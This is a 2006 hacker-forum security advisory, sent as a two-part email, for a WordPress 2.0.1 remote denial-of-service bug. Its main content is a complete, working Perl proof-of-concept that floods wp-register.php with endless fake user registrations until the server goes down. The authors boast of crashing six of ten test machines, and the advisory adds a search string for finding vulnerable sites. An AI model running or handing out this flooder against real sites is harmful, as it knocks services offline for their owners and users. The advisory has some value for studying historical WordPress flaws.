h4cky0u.org Advisory 014 - WordPress 2.0.1 Remote DoS Exploit. Written in perl.
02ba0469933f275bae61bcfc64283efe4e6cbd2a029b9fa87cf2f1f3988f185b
------=_Part_5949_11148151.1141837505833
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
------------------------------------------------------
HYSA-2006-005 h4cky0u.org Advisory 014
------------------------------------------------------
Date - Wed March 08 2006
TITLE:
=3D=3D=3D=3D=3D=3D
WordPress 2.0.1 Remote DoS Exploit
SEVERITY:
=3D=3D=3D=3D=3D=3D=3D=3D=3D
Medium
SOFTWARE:
=3D=3D=3D=3D=3D=3D=3D=3D=3D
Wordpress 2.0.1 and prior
INFO:
=3D=3D=3D=3D=3D
WordPress is a state-of-the-art semantic personal publishing platform with =
a
focus on aesthetics, web standards, and
usability. What a mouthful. WordPress is both free and priceless at the sam=
e
time.
Support Website : http://wordpress.org/
POC:
=3D=3D=3D=3D
#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all
dudes from #DevilDev ;)
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 go=
t
crashed
use Socket;
if (@ARGV < 2) { &usage; }
$rand=3Drand(10);
$host =3D $ARGV[0];
$dir =3D $ARGV[1];
$host =3D~ s/(http:\/\/)//eg; #no http://
for ($i=3D0;
$i<9999999999999999999999999999999999999999999999999999999999999999999999;
$i++) #0_o :)
{
$user=3D"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x=
6f".$rand.$i;
#you N33d t0 be l33t t0 s33 th!S !
$data =3D "action=3Dregister&user_login=3D$user&user_email=3D$user\@
matrix.org&submit=3DRegister+%C2%BB";
$len =3D length $data;
$foo =3D "POST ".$dir."wp-register.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port =3D "80";
my $proto =3D getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+";
}
#s33 if the server is down
print "\n\n";
system('ping $host');
sub usage {
print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n"=
;
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /wordpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};
FIX:
=3D=3D=3D=3D
No fix available as of date.
GOOGLEDORK:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
"Powered by WordPress"
CREDITS:
=3D=3D=3D=3D=3D=3D=3D=3D
- Exploit coded by matrix_killer of h4cky0u Security Forums
Mail : matrix_k at abv dot bg
Web : http://www.h4cky0u.org
- Co Researcher -
h4cky0u of h4cky0u Security Forums.
Mail : h4cky0u at gmail dot com
Web : http://www.h4cky0u.org
ORIGINAL ADVISORY:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://www.h4cky0u.org/advisories/HYSA-2006-005-wordpress.txt
--
http://www.h4cky0u.org
(In)Security at its best...
------=_Part_5949_11148151.1141837505833
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
<p>------------------------------------------------------<br> &n=
bsp; HYSA-2006-005 <a href=3D"http://h4cky0u.org">h4cky0u.org</=
a> Advisory 014<br>------------------------------------------------------<b=
r>Date - Wed March 08 2006
</p>
<p><br>TITLE:<br>=3D=3D=3D=3D=3D=3D</p>
<p>WordPress 2.0.1 Remote DoS Exploit</p>
<p><br>SEVERITY:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>
<p>Medium</p>
<p><br>SOFTWARE:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>
<p>Wordpress 2.0.1 and prior</p>
<p><br>INFO:<br>=3D=3D=3D=3D=3D</p>
<p>WordPress is a state-of-the-art semantic personal publishing platform wi=
th a focus on aesthetics, web standards, and </p>
<p>usability. What a mouthful. WordPress is both free and priceless at the =
same time.</p>
<p>Support Website : <a href=3D"http://wordpress.org/">http://wordpress.org=
/</a></p>
<p><br>POC:<br>=3D=3D=3D=3D</p>
<p>#!perl <br>#Greets to all omega-team members + h4cky0u[<a href=3D"http:/=
/h4cky0u.org">h4cky0u.org</a>], lessMX6 and all dudes from #DevilDev ;)<br>=
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 go=
t crashed
</p>
<p>use Socket;</p>
<p>if (@ARGV < 2) { &usage; }</p>
<p>$rand=3Drand(10); <br>$host =3D $ARGV[0];<br>$dir =3D $ARGV[1]; </p>
<p>$host =3D~ s/(http:\/\/)//eg; #no http://<br>for ($i=3D0; $i<99999999=
99999999999999999999999999999999999999999999999999999999999999; $i++) #0_o =
:)<br>{ <br>$user=3D"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\=
x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
<br>$data =3D "action=3Dregister&user_login=3D$user&user_email=
=3D$user\@matrix.org&submit=3DRegister+%C2%BB";<br>$len =3D length=
$data; <br>$foo =3D "POST ".$dir."wp-register.p=
hp HTTP/1.1\r\n".
<br>  =
; "Accept: */*\r\n".<br>  =
; "Accept-Langua=
ge: en-gb\r\n".<br> &nb=
sp; "Content-Type: application/x-www-for=
m-urlencoded\r\n".<br> =
"Accept-Encoding: gzip, deflate\r=
\n".
<br>  =
; "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows =
NT 5.0)\r\n".<br>  =
; "Host: $host\r\n".<br>  =
; &=
quot;Content-Length: $len\r\n".<br>  =
; "Connection: Keep-Al=
ive\r\n".
<br>  =
; "Cache-Control: no-cache\r\n\r\n".<br> "$=
data";</p>
<p> my $port =3D "80";<br> &nb=
sp; my $proto =3D getprotobyname('tcp');<br> =
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);<br> c=
onnect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;<br> &nbs=
p; send(SOCKET,"$foo", 0);
<br> syswrite STDOUT, "+"; <br>} </p>
<p>#s33 if the server is down<br>print "\n\n";<br>system('ping $h=
ost');</p>
<p>sub usage {</p>
<p>print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_k=
iller\n";<br>print "\te-mail: matrix_k\@abv.bg\n";<br>print =
"\tusage: \n";<br>print "\t$0 <host> </dir/>\n&q=
uot;;
<br>print "\tex: $0 <a href=3D"http://127.0.0.1">127.0.0.1</a> /wordpr=
ess/\n";<br>print "\tex2: $0 <a href=3D"http://127.0.0.1">127.0.0=
.1</a> / (if there isn't a dir)\n";<br>exit();<br>};</p>
<p><br>FIX:<br>=3D=3D=3D=3D</p>
<p>No fix available as of date.</p>
<p><br>GOOGLEDORK:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>
<p>"Powered by WordPress" </p>
<p><br>CREDITS:<br>=3D=3D=3D=3D=3D=3D=3D=3D</p>
<p>- Exploit coded by matrix_killer of h4cky0u Security Forums</p>
<p>Mail : matrix_k at abv dot bg</p>
<p>Web : <a href=3D"http://www.h4cky0u.org/">http://www.h4cky0u.org</a></p>
<p><br>- Co Researcher -</p>
<p>h4cky0u of h4cky0u Security Forums.</p>
<p>Mail : h4cky0u at gmail dot com</p>
<p>Web : <a href=3D"http://www.h4cky0u.org/">http://www.h4cky0u.org</a></p>
<p><br>ORIGINAL ADVISORY:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D</p>
<p><a href=3D"http://www.h4cky0u.org/advisories/HYSA-2006-005-wordpress.txt=
">http://www.h4cky0u.org/advisories/HYSA-2006-005-wordpress.txt</a></p><br>=
-- <br><a href=3D"http://www.h4cky0u.org">http://www.h4cky0u.org</a><br>(In=
)Security at its best...=20
------=_Part_5949_11148151.1141837505833--